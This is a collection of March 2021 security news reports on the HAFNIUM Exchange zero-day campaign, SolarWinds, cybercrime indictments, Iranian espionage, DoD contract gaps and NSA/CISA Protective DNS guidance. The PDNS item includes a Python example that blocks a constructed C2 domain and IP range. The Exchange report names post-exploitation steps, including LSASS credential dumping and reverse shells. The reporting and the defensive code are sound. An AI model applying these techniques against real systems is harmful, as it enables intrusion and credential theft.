“Zero days” are vulnerabilities that hackers discover and use to pry open secret doors in software. Their name derives from the countdown to patching that begins after they are deployed. In this case, it took Microsoft 28 days to produce a patch once it was notified.
Mandia cautioned that the mass hack is not apt to trigger any critical infrastructure failures or cost lives. “It’s not going to draw blood.” But it highlights how there are no rules of engagement in cyberspace, something governments urgently need to address “before something catastrophic happens.”
Asked for comment on Monday about allegations it was behind the hack, the Chinese Embassy in Washington pointed to remarks last week from Foreign Ministry spokesperson Wang Wenbin saying that China “firmly opposes and combats cyber attacks and cyber theft in all forms.” He said attribution of cyberattacks should be based on evidence and not “groundless accusations.”
Mandia compared the Exchange hack with the SolarWinds hacking campaign, which his company discovered in December and which Washington has blamed on elite Russian intelligence agents.
“The SolarWinds attack was very surreptitious, very stealthy, very focused. The operator showed restraint and they went deep not wide,” said Mandia, who appeared in multiple Capitol Hill hearings on SolarWinds. “This attack (Exchange) feels very wide, but what I don’t have an answer to yet is just how deep it is.”
U.S. officials say at least nine federal agencies and over 100 private sector targets were affected by the SolarWinds campaign, named after the Texas company whose network management software was used to seed malware to more than 18,000 customers. Only a small number were hacked during the campaign, which went eight months without being detected.
Mandia said Russian intelligence operatives had manually penetrated the networks of between 60 and 100 different victims. Security researchers say telecommunications and software companies and think tanks were especially hard hit.
Idaho Man Charged With Hacking Into Computers in Georgia
9.3.2021 BigBrothers Securityweek
An Idaho man faces federal charges after authorities say he hacked into the computers of a Georgia city and Atlanta area medical clinics.
Robert Purbeck — who used online aliases Lifelock and Studmaster — was indicted Tuesday by a federal grand jury in Georgia, according to a news release from the U.S. attorney’s office in Atlanta. He’s charged with computer fraud and abuse, access device fraud and wire fraud.
Purbeck, who’s 41 and lives in Meridian, Idaho, was arrested and appeared before a federal magistrate judge in Boise, the release says. No lawyer for Purbeck who might be able to comment on the charges was listed in online court records.
Between June 2017 and April 2018, Purbeck is accused of buying the usernames and passwords to computer servers belonging to multiple Georgia victims and then using that information to access their computer to steal personal information.
Federal prosecutors say Purbeck stole: medical records and other documents containing the names, addresses, birth dates and Social Security numbers of more than 43,000 people from a medical clinic in Griffin, Georgia; the personal information of more than 7,000 people from a medical practice in Locust Grove, Georgia; and police reports and other documents with personal information of more than 14,000 people from the city of Newnan, Georgia.
He’s also accused of hacking into a Florida orthodontist’s computers in June 2018 and taking medical records for more than 1,800 people, the release says. He’s then accused of threatening to sell the stolen patient information, as well as the personal information of the orthodontist’s child, unless the orthodontist paid a ransom in bitcoins, the release says.
Ukrainians Extradited to U.S. for Providing Money Laundering Services to Cybercriminals
9.3.2021 BigBrothers Securityweek
Two Ukrainians charged for their involvement in a network providing cash-out and money laundering services to cybercriminals have been extradited to the United States.
The individuals, Viktor Vorontsov, 39, and Zlata Hanska Muzhuk, 40, of Ukraine, were arrested in the Czech Republic. They were indicted in February 2020 in the Northern District of Texas.
According to the indictment, the two were part of a cash-out and money laundering network offering services to cybercriminals who accessed bank accounts using stolen credentials, and then transferred funds to drop accounts maintained by the cash-out actors.
Muzhuk and Vorontsov, the indictment reveals, operated a network of drop accounts and money mules that facilitated the fraudulent transfer of money from victims.
The conspiracy existed “for the entirety of 2017,” the indictment reveals. In October and November of that year, roughly $500,000 was transferred as part of the conspiracy.
The Czech National Organized Crime Agency (NCOZ) collaborated with the Federal Bureau of Investigation (FBI) in gathering evidence against Muzhuk and Vorontsov.
A criminal complaint and an arrest warrant were issued in early 2020 in Dallas, and the two were arrested in the Czech Republic, where Muzhuk was visiting Vorontsov at his residence.
Both were detained pending the extradition proceedings and were transferred to FBI custody on March 3, 2021, after their extraditions were granted by the Ministry of Justice of the Czech Republic, in January and February.
They both appeared in court in the Northern District of Texas and entered not-guilty pleas to the charges.
Iranian Hackers Using Remote Utilities Software to Spy On Its Targets
9.3.2021 BigBrothers Thehackernews
Hackers with suspected ties to Iran are actively targeting academia, government agencies, and tourism entities in the Middle East and neighboring regions as part of an espionage campaign aimed at data theft.
Dubbed "Earth Vetala" by Trend Micro, the latest finding expands on previous research published by Anomali last month, which found evidence of malicious activity aimed at UAE and Kuwait government agencies that abused the ScreenConnect remote management tool.
The cybersecurity firm linked the ongoing attacks with moderate confidence to a threat actor widely tracked as MuddyWater, an Iranian hacker group known for its offensives primarily against Middle Eastern nations.
Earth Vetala is said to have leveraged spear-phishing emails containing embedded links to a popular file-sharing service called Onehub to distribute malware that ranged from password dumping utilities to custom backdoors, before initiating communications with a command-and-control (C2) server to execute obfuscated PowerShell scripts.
The links themselves direct victims to a .ZIP file that contains legitimate remote administration software developed by RemoteUtilities, which is capable of downloading and uploading files, capturing screenshots, browsing files and directories, and executing and terminating processes.
Noting that the tactics and techniques between the two campaigns that distribute RemoteUtilities and ScreenConnect are broadly similar, Trend Micro said the targets of the new wave of attacks are mainly organizations located in Azerbaijan, Bahrain, Israel, Saudi Arabia, and the UAE.
In one particular instance involving a compromised host in Saudi Arabia, the researchers found that the adversary tried unsuccessfully to configure SharpChisel — a C# wrapper for a TCP/UDP tunneling tool called chisel — for C2 communications, before downloading a remote access tool, a credential stealer, and a PowerShell backdoor capable of executing arbitrary remote commands.
"Earth Vetala represents an interesting threat," Trend Micro said. "While it possesses remote access capabilities, the attackers seem to lack the expertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater threat actors — and in other connected campaigns, the attackers have shown higher levels of technical skill."
Chinese hackers allegedly hit thousands of organizations using Microsoft Exchange
8.3.2021 BigBrothers Securityaffairs
Thousands of organizations may have been victims of cyberattacks on Microsoft Exchange servers conducted by China-linked threat actors since January.
At least tens of thousands of Microsoft customers may have been hacked by allegedly China-linked threat actors since January, including business and government agencies.
The attacks started in January, but the attackers’ activity intensified in recent weeks according to the experts at security firm Volexity.
Volexity experts investigated the compromise of Microsoft Exchange servers belonging to its customers and discovered that the attackers exploited a zero-day server-side request forgery (SSRF) vulnerability in Microsoft Exchange (CVE-2021-26855).
“The attacker was using the vulnerability to steal the full contents of several user mailboxes. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment.” reads the analysis published by Volexity. “The attacker only needs to know the server running Exchange and the account from which they want to extract e-mail.”
Microsoft confirmed the attacks against the Exchange servers, which aimed at stealing emails and installing malware to gain persistence in the target networks.
“In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” wrote Microsoft. “Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.”
Last week Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported MS Exchange versions that are actively exploited in the wild.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued the Emergency Directive 21-02 in response to the disclosure of zero-day vulnerabilities in Microsoft Exchange.
The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers, access email accounts, and install backdoors to maintain access to victim environments.
The US CISA released the emergency directive, titled “Mitigate Microsoft Exchange On-Premises Product Vulnerabilities,” to order federal agencies to urgently update or disconnect MS Exchange on-premises installs.
“CISA partners have observed active exploitation of vulnerabilities in Microsoft Exchange on-premises products. Neither the vulnerabilities nor the identified exploit activity is currently known to affect Microsoft 365 or Azure Cloud deployments. Successful exploitation of these vulnerabilities allows an attacker to access on-premises Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.” reads the advisory published by US CISA.
“CISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action.”
CISA urges agencies that have the expertise to collect forensic triage artifacts and determine whether there is any anomalous behavior or indication of compromise.
The popular investigator Brian Krebs speculates that at least 30,000 Microsoft customers were impacted by the hacking campaign.
“At least 30,000 organizations across the United States — including a significant number of small businesses, towns, cities and local governments — have over the past few days been hacked by an unusually aggressive Chinese cyber espionage unit that’s focused on stealing email from victim organizations, multiple sources tell KrebsOnSecurity.” reported Krebs. “The espionage group is exploiting four newly-discovered flaws in Microsoft Exchange Server email software, and has seeded hundreds of thousands of victim organizations worldwide with tools that give the attackers total, remote control over affected systems.”
Chinese authorities denied any involvement in the recent attacks.
“China has reiterated on multiple occasions that given the virtual nature of cyberspace and the fact that there are all kinds of online actors who are difficult to trace, tracing the source of cyberattacks is a complex technical issue,” said Wang Wenbin, a spokesman for China’s Ministry of Foreign Affairs. “It is also a highly sensitive political issue to pin the label of cyberattack to a certain government.”
Volexity experts observed an escalation of the attacks in late February, when attackers started chaining multiple vulnerabilities and targeting a larger number of victims.
“During the course of multiple incident response efforts, Volexity identified that the attacker had managed to chain the SSRF vulnerability with another that allows remote code execution (RCE) on the targeted Exchange servers (CVE-2021-27065).” continues Volexity. “In all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT), and move laterally to other systems and environments.”
Researchers at the MS Exchange Server team have recently released a script that could be used by administrators to check if their installs are vulnerable to the recently disclosed vulnerabilities.
Microsoft released the tool as open-source on GitHub, it can be used to check the status of Exchange servers.
The script automates the tests for the four zero-day vulnerabilities in Microsoft Exchange Server.
“Microsoft has released an updated script that scans Exchange log files for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021.” states CISA.
“CISA is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the Test-ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised. For additional information on the script, see Microsoft’s blog HAFNIUM targeting Exchange Servers with 0-day exploits.”
U.S. DoD Weapons Programs Lack ‘Key’ Cybersecurity Measures
6.3.2021 BigBrothers Threatpost
The lack of cybersecurity requirements in weapons contracts from the Department of Defense opens the door for dangerous cyberattacks.
Weapons programs from the U.S. Department of Defense (DoD) are falling short when it comes to incorporating cybersecurity requirements, according to a new watchdog report.
While the DoD has developed a range of policies aimed at hardening the security for its weapon systems, the guidance leaves out a key detail — the contracts for procuring various weapons.
These contracts are awarded to various manufacturers, from massive military contractors to small businesses, for hundreds of billions of dollars each year by the U.S. government. And according to a new report by the U.S. Government Accountability Office (GAO), 60 percent of the contracts included zero requirements when it comes to cybersecurity protection measures.
The GAO, which is an independent, non-partisan agency that works for Congress and acts as a “congressional watchdog” and third-party auditor, noted that the inclusion of cybersecurity stipulations in the contracts is “key.” When it comes to any type of requirement in weapons contracts, whether it’s cybersecurity- or services-related, “if it is not in the contract, do not expect to get it,” according to the report.
“Specifically, cybersecurity requirements should be defined in acquisition program contracts, and criteria should be established for accepting or rejecting the work and for how the government will verify that requirements have been met,” according to the GAO’s report, released Thursday [PDF]. “However, GAO found examples of program contracts omitting cybersecurity requirements, acceptance criteria or verification processes.”
Weapons Contracts
When it comes to security, the weapons contracts should define requirements “to satisfy the needs of the agency, identify criteria for accepting or rejecting the work, and where applicable, establish how the government will verify that requirements have been met,” according to the GAO.
However, the majority of the DoD’s weapons contracts do not include any cybersecurity requirements at all — and if they do, the terms remain vague in terms of how security measures would be implemented, or shy away from defining cybersecurity activities “in objective terms with a clear basis for accepting or rejecting the system.”
Another issue is that the contracts do not identify measures for verifying that security requirements are met.
“For example, one of the programs had a cybersecurity strategy that identified the [risk-management framework] RMF categorization and described how the program would select security controls,” according to the GAO’s report. “However, when the contract was awarded, it did not include cybersecurity requirements in the statement of work, the system specification or the contract deliverables.”
Brandon Hoffman, CISO at Netenrich, said it is “stunning” that at this point, cybersecurity requirements are largely not part of the government’s weapons-systems contracts.
“It is equally hard to consider why cybersecurity would not be critical to the acquisition of a weapons system,” Hoffman told Threatpost. “Thinking about the potential damage that could be done with unauthorized access to networks related to weapons systems, for actual human life or the loss of IP/military advantage, these contracts should absolutely have strict cyber-requirements.”
DoD Weapons Security Risks
Most modern DoD weapon systems depend on software and various IT systems to operate. As an example, the U.S. Army plans to replace its decades-old vehicles – such as the Bradley infantry-fighting vehicle and the Abrams main battle tank – with new systems incorporating autonomous systems, said the GAO.
Should the DoD’s network of sophisticated, expensive weapons systems be hit by cybercriminals, they could become incapacitated, leading to potentially dangerous outcomes. Dirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost that the top risk here is to lose communication of – and ultimately control over – those systems.
“A loss of confidentiality means the enemy can gain vital intelligence about operations, tactics and strategies during battle,” he said. “Losing the integrity can hamper a weapons system in its functions, for example its target acquisition subsystem. Or, worse, it could be used against one’s own forces. If availability is lost, central command’s momentum is likely affected.”
Key Recommendations For DoD
Moving forward, the GAO made three recommendations, each suggesting that the Army, Navy and Marine Corps provide better guidance on how programs should incorporate tailored cybersecurity requirements into contracts.
“DoD concurred with two recommendations, and stated that the third — to the Marine Corps — should be merged with the one to the Navy,” according to the GAO. “DoD’s response aligns with the intent of the recommendation.”
Government cybersecurity measures have been under scrutiny, particularly over the past few months after the sprawling SolarWinds cyberespionage campaign hit various U.S. government agencies and others hard.
NSA, DHS Issue Guidance on Protective DNS
6.3.2021 BigBrothers Securityweek
The U.S. National Security Agency and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) this week published joint guidance on Protective DNS (PDNS).
Designed to translate domain names into IP addresses, the Domain Name System (DNS) is a key component of Internet and network communications.
Protective DNS was designed as a security service that leverages the DNS protocol and infrastructure for the analysis of DNS queries and mitigation of possible threats.
Attacks involving domain names may take various forms, including typosquatting, links in phishing emails, connecting compromised devices to remote command and control servers, and data exfiltration to remote hosts.
“The domain names associated with malicious content are often known or knowable, and preventing their resolution protects individual users and the enterprise,” the NSA and CISA note.
Both the NSA and CISA have previously issued documents related to the mitigation of DNS-related issues, and the new guidance is meant to provide further details on the benefits and risks of protective DNS services.
PDNS, the joint guidance says, relies on a policy-implementing DNS resolver – often called Response Policy Zone (RPZ) functionality – which checks both domain name queries and returned IP addresses to prevent connections to malicious sites.
“PDNS can also protect a user by redirecting the requesting application to a non-malicious site or returning a response that indicates no IP address was found for the domain queried,” the two agencies explain.
To set up PDNS, an organization can simply modify its recursive resolver to rely on the PDNS provider’s DNS server. However, software changes on hosts are required for more complex and secure PDNS deployments, the NSA and CISA say.
Some of the outlined best practices regarding PDNS involve the use of a PDNS system as part of a layered defense-in-depth strategy, blocking unauthorized DNS queries, and taking into consideration hybrid enterprise architectures.
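As an added illustration of the policy-implementing resolver described above (example code written for this page, not taken from the NSA/CISA guidance or from any PDNS vendor), the following Python models RPZ-style policy evaluation: the queried name is checked first, and if it passes, the addresses in the upstream answer are checked too. The rule sets, upstream answers, sinkhole address and domain names are all constructed for the example; a real RPZ deployment expresses the same triggers and actions as DNS zone records in the resolver's configuration rather than as Python dictionaries.

```python
"""Toy model of a Protective DNS (PDNS) policy layer with RPZ-style semantics.

Two trigger types from the joint guidance are modelled: the queried domain
name (QNAME) and the IP addresses in the upstream answer. Policy actions are
NXDOMAIN (block), NODATA (empty answer), a redirect to a sinkhole host, or
PASSTHRU (an explicit allow that short-circuits the other checks).
All rules, names and addresses below are constructed for this example.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed QNAME triggers. A rule applies to the name and its subdomains;
# the most specific (longest) matching name wins, as in RPZ.
QNAME_RULES: Dict[str, str] = {
    "evil.example": "NXDOMAIN",            # known C2 domain: block it and every subdomain
    "paypa1.example": "sinkhole.example",  # typosquat: redirect clients to a sinkhole host
    "updates.evil.example": "PASSTHRU",    # carve-out: this one subdomain is explicitly allowed
    "tracker.example": "NODATA",           # answer "name exists, but has no address"
}

# Constructed IP triggers, applied to the *answer* of an otherwise clean query.
IP_RULES = [
    (ipaddress.ip_network("203.0.113.0/24"), "NXDOMAIN"),   # constructed hostile range
]

SINKHOLE_IPS = {"sinkhole.example": "192.0.2.1"}            # constructed sinkhole address

# Constructed stand-in for the upstream (non-policy) resolver.
UPSTREAM: Dict[str, List[str]] = {
    "www.example": ["198.51.100.10"],
    "c2.evil.example": ["203.0.113.7"],
    "updates.evil.example": ["198.51.100.20"],
    "paypa1.example": ["198.51.100.30"],
    "cdn.example": ["203.0.113.99"],   # benign-looking name whose answer lands in the hostile range
    "tracker.example": ["198.51.100.40"],
}


@dataclass
class Resolution:
    rcode: str                 # "NOERROR" or "NXDOMAIN"
    answers: List[str]         # IP strings; empty for NXDOMAIN and NODATA
    policy: Optional[str]      # which rule fired (None if no policy applied); worth logging


def _qname_policy(name: str):
    """Walk from the full name up through its parents; the first hit is the most specific."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in QNAME_RULES:
            return candidate, QNAME_RULES[candidate]
    return None, None


def _ip_policy(ips: List[str]):
    """Check every address in the answer against the IP triggers."""
    for ip in ips:
        addr = ipaddress.ip_address(ip)
        for net, action in IP_RULES:
            if addr in net:
                return f"ip:{net}", action
    return None, None


def resolve(name: str, upstream: Dict[str, List[str]] = UPSTREAM) -> Resolution:
    """Resolve `name` through the policy layer, then (if allowed) through upstream."""
    trigger, action = _qname_policy(name)
    if action == "PASSTHRU":
        return Resolution("NOERROR", upstream.get(name, []), f"passthru:{trigger}")
    if action == "NXDOMAIN":
        return Resolution("NXDOMAIN", [], f"qname:{trigger}")
    if action == "NODATA":
        return Resolution("NOERROR", [], f"qname:{trigger}")
    if action is not None:                       # any other value names a sinkhole host
        return Resolution("NOERROR", [SINKHOLE_IPS[action]], f"qname:{trigger}->{action}")

    answers = upstream.get(name)
    if answers is None:                          # genuinely unknown name
        return Resolution("NXDOMAIN", [], None)
    trigger, action = _ip_policy(answers)
    if action == "NXDOMAIN":
        return Resolution("NXDOMAIN", [], trigger)
    return Resolution("NOERROR", answers, None)


if __name__ == "__main__":
    for q in ["www.example", "c2.evil.example", "updates.evil.example",
              "paypa1.example", "cdn.example", "tracker.example"]:
        print(f"{q:24} -> {resolve(q)}")
```

The `policy` field is the part a SOC actually wants: a PDNS service that only returns NXDOMAIN without recording which trigger fired gives the defender no signal that a host tried to reach a blocked name, which is exactly the indicator of a compromised device the guidance describes.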
The joint document also provides assessments of several commercial PDNS providers, so that organizations are better informed when making decisions. The assessment is based on publicly available information about enterprise PDNS services, not on formal testing, and is not meant as a purchase recommendation.
Report: Russian Hackers Exploit Lithuanian Infrastructure
6.3.2021 BigBrothers Securityweek
Hacker groups linked to Russian intelligence conducted cyber-attacks against top Lithuanian officials and decision-makers last year and used the Baltic nation’s technology infrastructure as a base to hit targets elsewhere, a report by Lithuania’s intelligence service said Thursday.
The annual national security threat assessment report claimed that, among others, the Russian cyber-espionage group APT29 with alleged links to Russia’s intelligence services “exploited” Lithuania’s information technology infrastructure “to carry out attacks by APT29 against foreign entities developing a COVID-19 vaccine.”
The report produced by Lithuania’s State Security Department said the COVID-19 pandemic and lockdown in Lithuania, a NATO member that is Russia’s neighbor and a former Soviet republic, decreased Russian intelligence operations against the country in 2020 and shifted the Kremlin’s efforts to cyber-espionage.
“Nevertheless, Russian intelligence operations pose a major threat to Lithuania’s national security,” State Security Department head Darius Jauniskis told Lithuanian lawmakers as he presented the report at Seimas, the Parliament, on Thursday.
Jauniskis added that Moscow was using military and economic means, as well as influence through information, “for the implementation of its political aims” in the Baltic nation of 2.8 million.
The report estimated that the overall threat of cyber and information attacks has increased in Lithuania as the number of cyber-attacks was continuing to grow annually.
Jauniskis accused Russia of trying to use the pandemic as a way to create havoc in Lithuania, which he said had witnessed “dozens” of such “failed attempts” recently.
“Those activities were well-coordinated and fueled by anti-Western propaganda coming out from the Kremlin,” Jauniskis said.
Like its neighbors Estonia and Latvia, Lithuania has had icy relations with Russia since the nation regained its independence amid the fall of the Soviet Union in 1991.
Estonia’s foreign intelligence agency published its annual report last month saying that Russia is counting on the COVID-19 pandemic to weaken unity in the West, which would help Moscow gain a more prominent role in international affairs and allegedly lead to declining Western influence on the global stage.
German Officials Want Emails, IMs Tied to Real-World ID
6.3.2021 BigBrothers Securityweek
German security officials are proposing that Internet companies should link a user’s real-world identity to all of their instant messages, emails and other online communication, prompting criticism from digital rights activists.
Like in many other countries, mobile phone firms in Germany are required to verify a customer’s identity before selling them a SIM card. Under a proposal leaked late Tuesday, Germany’s Interior Ministry wants the same rule to apply to “number independent” telecommunications services such as WhatsApp, Signal or Facebook messenger.
A ministry spokesman declined to explicitly confirm the veracity of the proposal, which was leaked by secure email provider Posteo. But the spokesman said police had the right to interfere with communications privacy “whether the user resorts to classical telephony or encrypted telecommunications services.”
“I think it’s obvious that the security agencies in Germany need to have the same powers in the analogue world as in the digital world if they are going to do their job,” the spokesman, Steve Alter, told reporters in Berlin on Wednesday.
Henning Tillmann, co-chairman of D64, a group that campaigns for citizens’ rights in the digital world, warned that the proposal risked making Germany a “mini-China.”
“This couples technological ignorance with surveillance fantasies,” he wrote on Twitter.
The proposal is currently at the consultation stage among ministries and may not survive in this form in a planned telecommunications bill.
National Surveillance Camera Rollout Roils Privacy Activists
5.3.2021 BigBrothers Securelist
TALON, a network of smart, connected security cameras developed by Atlanta-based startup Flock Safety and installed by law enforcement around the country, raises surveillance-related privacy concerns.
While controversy over the potential overreach of neighborhood and law-enforcement video surveillance has focused mainly on Ring, an Atlanta-based startup has quietly rolled out its own network of smart surveillance cameras across the country, again raising questions of privacy and drawing the ire of some privacy advocates, according to a published report.
Flock Safety promises to protect neighborhoods with smart cameras with automated license plate recognition (ALPR) technology that are sold to homeowners associations, businesses or law enforcement and are designed to automatically read vehicle license plates “up to 75 MPH, day & night, up to 75 ft. away,” according to the company’s website.
Ostensibly, ALPR, which has been around for years but is gaining new momentum thanks to its integration with smart cameras, is aimed at protecting citizens. However, a published report suggests that Flock may be overstretching its wings and has expanded to do much more than merely provide a virtual neighborhood watch.
Vice Motherboard reported Wednesday that Flock has quietly built up an extensive nationwide network of its cameras called TALON that are maintained by law enforcement and offer up to 500 million scans of vehicles a month, according to one of a series of Flock emails obtained by the publication. Motherboard said its reporters viewed hundreds of pages of internal police emails from nearly 20 police departments around the country, obtained using public records requests.
Moreover, more than 500 police departments in more than 1,000 cities have access to Flock cameras, which are not only detecting license-plate information but also people, cars, animals and bicycles, according to info obtained by Motherboard.
The company also boasted that it’s “collecting evidence” that helps police solve four to five crimes per hour, with administrators of neighborhood camera networks able to share video data not only with law enforcement, but also the home owner association’s board, or the individual members of an entire neighborhood, according to the report.
Good Intentions?
Flock offers two types of cameras: one called the “Sparrow” that uploads images to a secure server for only those who have access to view and share, and another called the “Falcon” that can use the data collected to automatically alert police if the plate is already on a “hotlist” for potential criminal activity, so they can track the vehicle and its occupants.
Supporters of the technology and initiative argue trying to help reduce crime and protect neighborhoods is a good thing. Flock company founder and CEO Garrett Langley was inspired to try “to eliminate non-violent crime while respecting privacy” after he himself was a victim of property crime in his Atlanta neighborhood, according to the website. Langley so far has not responded to an email sent Thursday by Threatpost requesting comments and details about Flock TALON and the technology’s privacy protections.
A promotional video on the company’s website said that in their research with law enforcement, Flock founders learned that license-plate info was the missing link in helping solve non-violent crimes, and they designed Flock cameras to provide this info accurately and securely. Key selling points for the company are that it has made its smart cameras small and affordable, so they are both unobtrusive and cost-effective for customers.
Indeed, Flock also is aware of the privacy issues that its technology can raise, claiming that it’s the “only ALPR crime-solving camera system with privacy protection measures built in.”
The video explains this concept a bit further, saying that the customer alone has all the access to the camera data, leaving it up to them to decide if they want to share it and with whom.
But as any security or privacy expert knows, it’s not difficult for that type of data to fall into the wrong hands. This is why not everyone is as thrilled with the integration of ALPR into smart surveillance cameras as Flock’s founders and customers.
Flock Roll Out Sparks Privacy Concerns
Digital privacy group the Electronic Frontier Foundation has criticized ALPR technology and companies like Flock, claiming “there is no real evidence that ALPRs reduce crime,” and that their technology is purely another surveillance tool, plain and simple.
“ALPR vendors, like other surveillance salespeople, operate on the assumption that surveillance will reduce crime by either making would-be criminals aware of the surveillance in hopes it will be a deterrent, or by using the technology to secure convictions of people that have allegedly committed crimes in the neighborhood,” according to a blog post by Jason Kelley and Matthew Guariglia written last September. “However, there is little empirical evidence that such surveillance reduces crime.”
Flock would certainly beg to differ on this point. An article from Fox 5 Atlanta, linked from the company’s website, claimed in November 2019 that Flock safety cameras helped reduce crime by up to 64 percent in six months in an area near Six Flags Over Georgia. Other linked articles boast similar success stories in how Flock helped prevent crimes or even, in the case of a College Park, Ga., police sergeant who was shot and wounded on duty, catch a murder suspect.
Still, the controversy over using ubiquitous surveillance and smart-camera technology to help solve crime is likely to continue to have pushback from privacy advocates, even if those behind the technology have good intentions. This was recently evidenced yet again by criticism of a pilot program in Jackson, Miss., to use the Ring door cameras as part of surveillance efforts to help police fight rising crime, which the American Civil Liberties Union (ACLU) and others bashed.
CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws
5.3.2021 BigBrothers Thehackernews
Following Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning of "active exploitation" of the vulnerabilities.
The alert comes on the heels of Microsoft's disclosure that China-based hackers were exploiting unknown software bugs in Exchange server to steal sensitive data from select targets, marking the second time in four months that the U.S. has scrambled to address a widespread hacking campaign believed to be the work of foreign threat actors.
While the company mainly attributed the campaign to a threat group called HAFNIUM, Slovakian cybersecurity firm ESET said it found evidence of CVE-2021-26855 being actively exploited in the wild by several cyber espionage groups, including LuckyMouse, Tick, and Calypso targeting servers located in the U.S., Europe, Asia, and the Middle East.
Researchers at Huntress Labs have also sounded the alarm about mass exploitation of Exchange servers, noting that over 350 web shells have been discovered across approximately 2,000 vulnerable servers.
"Among the vulnerable servers, we also found over 350 web shells — some targets may have more than one web shell, potentially indicating automated deployment or multiple uncoordinated actors," Huntress senior security researcher John Hammond said. "These endpoints do have antivirus or EDR solutions installed, but this has seemingly slipped past a majority of preventative security products."
The latest development indicates a much larger spread that extends beyond the "limited and targeted" attacks reported by Microsoft earlier this week.
It's not clear if any U.S. government agencies have been breached in the campaign, but the CISA directive underscores the urgency of the threat.
Strongly urging organizations to apply the patches as soon as possible, the agency cited the "likelihood of widespread exploitation of the vulnerabilities after public disclosure and the risk that federal government services to the American public could be degraded."
Microsoft Exchange Zero-Day Attackers Spy on U.S. Targets
4.3.2021 BigBrothers Threatpost
Full dumps of email boxes, lateral movement and backdoors characterize sophisticated attacks by a Chinese APT – while more incidents spread like wildfire.
Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.
The attacks are “limited and targeted,” according to Microsoft, spurring it to release out-of-band patches this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
However, other researchers have reported seeing the activity compromising mass swathes of victim organizations.
“The team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,” a spokesperson at Huntress told Threatpost.
The culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.
“Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,” according to an announcement this week from Microsoft on the attacks.
Zero-Day Security Bugs in Exchange Server
“The fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week’s Patch Tuesday release leads us to believe the flaws are quite severe even if we don’t know the full scope of those attacks,” Satnam Narang, staff research engineer at Tenable, said via email.
Microsoft patched the following bugs this week, and admins should update accordingly:
CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.
CVE-2021-26857 is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.
CVE-2021-26858 and CVE-2021-27065 are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server – thus achieving remote code execution (RCE).
Researchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, “This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.”
They also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.
In addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.
“Based on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user’s mailbox,” said Tenable’s Narang. “The other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization’s network.”
What Happened in the Hafnium Attacks?
In the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.
“In all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,” according to Volexity’s writeup.
Following web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:
Using Procdump to dump the LSASS process memory;
Using 7-Zip to compress stolen data into ZIP files for exfiltration;
Adding and using Exchange PowerShell snap-ins to export mailbox data;
Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;
And downloading PowerCat from GitHub, then using it to open a connection to a remote server.
